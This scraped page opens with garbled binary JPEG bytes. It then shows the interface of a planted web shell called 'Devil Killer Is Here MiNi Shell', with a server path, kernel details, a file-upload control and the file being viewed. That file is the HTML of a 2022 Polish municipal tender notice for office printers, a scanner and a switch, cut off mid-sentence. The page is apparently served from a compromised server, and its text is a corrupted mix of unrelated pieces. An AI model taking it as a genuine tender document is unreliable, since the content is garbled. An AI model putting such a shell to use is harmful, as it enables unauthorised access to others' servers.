JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220429/0014074301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wykon. dostawy sprzętu infor. w ramach real. konkursu gran. Cyfrowa Gmina obejmującą:Dostawę Urządzeń wielofunk. kolorowych (19 szt.),Urządzeń wielofunk. mono (8 szt.)skanera (1szt.)i switcha (1 szt.) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Dzierżoniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890717830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 746450397</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 746450882</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@um.dzierzoniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/, https://bip.um.dzierzoniow.pl/, https://dzierzoniow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykon. dostawy sprzętu infor. w ramach real. konkursu gran. Cyfrowa Gmina obejmującą:Dostawę Urządzeń wielofunk. kolorowych (19 szt.),Urządzeń wielofunk. mono (8 szt.)skanera (1szt.)i switcha (1 szt.) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-49314836-c78f-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00140743</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00013496/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa Urządzeń wielofunkcyjnych kolorowych (19 szt.), Urządzeń wielofunkcyjnych mono (8 szt.) skanera (1 szt.) i switcha (1 szt.).</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie dofinansowane ze środków Unii Europejskiej w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020, działanie 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia - projekt grantowy „Cyfrowa gmina”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dzierzoniow.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej<br/>eZamawiajacy, tj.: Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s; Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje;Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji w przypadku Internet Explorer minimalnie wersja 10.0;Włączona obsługa JavaScript;<br/>Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający<br/>określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po<br/>upływie terminu otwarcia ofert. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim<br/>źródłem czasu. Zamawiający określił dopuszczalne formaty przesyłanych danych w SWZ tj. plików o<br/>wielkości do 100 MB. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .rtf .xls .jpg<br/>(.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający<br/>rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. Wymagania techniczne i organizacyjne<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej zostały opisane na Platformie w<br/>zakładce „Regulacje i procedury procesu zakupowego” pod adresem internetowym<br/>https://dzierzoniow.ezamawiajacy.pl/. Wszelką korespondencję związaną z postępowaniem, należy<br/>przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli<br/>dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej<br/>niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>Oferta wraz z załącznikami musi zostać w ogólnie przyjętych formatach danych i<br/>złożona w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem osobistym albo podpisem zaufanym pod rygorem nieważności.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>musi być zgodny z wymogami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem Danych jest Gmina Miejska<br/>Dzierżoniów reprezentowana przez Burmistrza Dzierżoniowa ul. Rynek 1, 58-200 Dzierżoniów tel. 74<br/>645 0800; Inspektor Ochrony Danych - Kontakt: Urząd Miasta w Dzierżoniowie, ul. Rynek 1, pok. 22<br/>tel. 74 645 0808, e-mail: inspektorodo@um.dzierzoniow.pl; Będziemy przetwarzać Twoje dane w celu<br/>przeprowadzenia zamówienia publicznego, a w przypadku wyboru najkorzystniejszej oferty w celu<br/>zawarcia i realizacji umowy, Będziemy przetwarzać Twoje dane na podstawie: 1. Art. 6 ust. 1 lit. c<br/>RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na<br/>administratorze 2. Ustawy z dnia 11.09.2019r. Prawo zamówień publicznych wraz z aktami<br/>wykonawczymi do ustawy 3. Ustawy z dnia 27.08.2009r. o finansach publicznych. W przypadku wyboru<br/>najkorzystniejszej oferty również na podstawie art. 6 ust. 1 lit. b) RODO- tj. przetwarzanie jest<br/>niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą lub do podjęcia działań<br/>na żądanie osoby, której dane dotyczą przed zawarciem umowy; Twoje dane osobowe będą<br/>przechowywane przez okres wynikający z jednolitego rzeczowego wykazu akt lub przez okres<br/>trwałości<br/>projektu dofinansowanego ze źródeł zewnętrznych wynikający z odrębnych przepisów prawa;<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; Odbiorcy Twoich danych - Twoje dane osobowe w postaci nazwy/imienia i nazwiska oraz adresu prowadzenia działalności gospodarczej mogą zostać udostępnione:- w Biuletynie Zamówień<br/>Publicznych / w Dzienniku Urzędowym Unii Europejskiej,- na Platformie Zakupowej eZamawiający,-w<br/>Biuletynie Informacji Publicznej Urzędu Miasta w Dzierżoniowie,-wykonawcom biorącym udział w<br/>postępowaniu,-organom upoważnionym na mocy przepisów prawa,-wykonawcom świadczącym usługi<br/>na rzecz Zamawiającego, min. firma Market Planet Otwarty Rynek Elektroniczny S.A.-dostawca<br/>platformy zakupowej do obsługi zamówień publicznych.Ponadto po zawarciu umowy w/w dane mogą<br/>zostać udostępnione każdej osobie, która wystąpi z wnioskiem o ich udostępnienie w trybie dostępu do<br/>informacji publicznej (jeśli nie będą zachodziły przesłanki wyłączające); Twoje prawa związane z<br/>przetwarzaniem danych osobowych - Przysługują Ci, w sytuacjach określonych prawem, następujące<br/>prawa związane z przetwarzaniem danych osobowych:- na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych ;- na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO ; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;Nie przysługuje Ci:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Klauzula<br/>informacyjna dotycząca przetwarzania danych osobowych związanych z zamówieniami publicznymi stanowi załącznik nr 8 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZI-1.271.31.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie dostawy sprzętu informatycznego w ramach realizacji konkursu grantowego Cyfrowa Gmina obejmującą: Dostawę Urządzeń wielofunkcyjnych kolorowych (19 szt.), Urządzeń wielofunkcyjnych mono (8 szt.) skanera (1szt.) i switcha (1 szt.).<br/><br/>Zadanie dofinansowane ze środków Unii Europejskiej w ramach Programu Operacyjnego Polska Cyfrowa na lata 2014-2020, działanie 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia - projekt grantowy „Cyfrowa gmina”.<br/><br/>2. Szczegółowy opis przedmiotu zamówienia określony został w załączniku nr 10 do SWZ.<br/><br/>3. Do obowiązków Wykonawcy należy:<br/>1) dostawa przedmiotu zamówienia do siedziby jednostek organizacyjnych Zamawiającego wskazanych w załączniku nr 3 do projektu umowy,<br/>2) dostawa przedmiotu zamówienia fabrycznie nowego, nieużywanego, wolnego od wad konstrukcyjnych, materiałowych i prawnych,<br/>3) przekazywania jednostkom organizacyjnym Zamawiającego dokumentów, o których mowa w § 2 ust. 3 projektu umowy stanowiącym załącznik nr 9 do SWZ. Wszystkie dokumenty załączone do dostarczonego jednostkom organizacyjnym Zamawiającego przedmiotu zamówienia muszą być sporządzone w języku polskim,<br/>4) przekazywanie protokołów częściowych przekazania sprzętu jednostkom organizacyjnym Zamawiającego (wg. wzoru będącego załącznikiem nr 2 do projektu umowy ) Zamawiającemu.<br/><br/>4. Sprzęt ma zostać dostarczony do siedziby Zamawiającego i jednostek mu podległych (zgodnie z załącznikiem nr 3 do projektu umowy) z:<br/>1) kartami gwarancyjnymi,<br/>2) instrukcjami obsługi i dokumentacją techniczną oferowanego sprzętu w języku polskim,<br/>3) dokumentami określającymi zasady świadczenia usług przez autoryzowany serwis w okresie gwarancyjnym i pogwarancyjnym.<br/><br/>5. Dostarczony sprzęt musi zawierać komplet dokumentacji technicznej (koniecznie deklarację zgodności CE z odpowiednią dyrektywą, pod którą sprzęt podlega).<br/><br/>6. Wykonawca na dwa dni przed zaplanowaną dostawą poinformuje Zamawiającego o planowanym terminie dostawy Sprzętu do siedziby danej jednostki organizacyjnej Zamawiającego.<br/><br/>7. Wykonawca w formularzu ofertowym w załączniku nr 1 do SWZ musi dokładnie wskazać model, kod producenta, który pozwoli określić zgodność oferowanego przedmiotu zamówienia z oczekiwaniami Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30216110-0 - Skanery komputerowe</p> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni<br/>wszystkie postawione w SWZ warunki, nie podlega wykluczeniu z postępowania, złoży ofertę<br/>niepodlegającą odrzuceniu oraz uzyska łącznie największą liczbę punktów stanowiących sumę<br/>punktów przyznanych w ramach każdego z podanych kryteriów, wyliczona zgodnie z poniższym<br/>wzorem:<br/>O = KC + KT <br/>gdzie :<br/>KC – liczba punktów uzyskanych w kryterium „Cena ofertowa brutto”.<br/>KT – liczba punktów uzyskanych w kryterium „Termin dostawy”.<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>Szczegółowy sposób liczenia punktów każdego z<br/>kryteriów w postępowaniu został określony w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa następujące warunki udziału w postępowaniu dotyczące zdolności<br/>technicznej lub zawodowej:<br/>- w zakresie doświadczenia:<br/>wykonał należycie dostawy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonuje: przynajmniej 1 dostawę obejmującą swoim zakresem urządzenia<br/>wielofunkcyjne o wartości minimum 30 000,00 zł brutto.<br/>Uwaga! W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>• warunek określony powyżej musi być spełniony w całości przez<br/>co najmniej jednego z Wykonawców wspólnie ubiegających się o zamówienie (jeden lub każdy z<br/>podmiotów musi posiadać samodzielnie wymagane doświadczenie).<br/>Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy Pzp (wzór stanowi załącznik nr 5 do<br/>SWZ), w którym wskażą które dostawy zostaną wykonane przez poszczególnych<br/>wykonawców w odniesieniu do spełnienia ww. warunku.<br/>W przypadku, gdy wykonawca polega na zdolnościach innego podmiotu w zakresie<br/>doświadczania, warunek określony powyżej musi być spełniony w<br/>całości przez podmiot udostępniający zasób.<br/>Oceniając zdolność techniczną lub zawodową Zamawiający może, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu w postępowaniu w zakresie<br/>wskazanym w rozdziale III SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw<br/>wykluczenia, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki<br/>dowodowe, wskazane w rozdziale IV ust. 2 pkt 2.1 SWZ. Oświadczenie należy złożyć zgodnie ze<br/>wzorem stanowiącym załącznik nr 2 do SWZ. Zgodnie z art. 274 ust. 1<br/>ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na<br/>dzień złożenia, następujących podmiotowych środków dowodowych: Potwierdzenie aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w rozdziale IV ust. 1 pkt. 1.2 SWZ w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - <br/>załącznik nr 7 do SWZ (dokument ten składa każdy z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia/podmiot udostępniający zasoby).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>- wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy zostały wykonane lub są wykonywane, oraz załączeniem 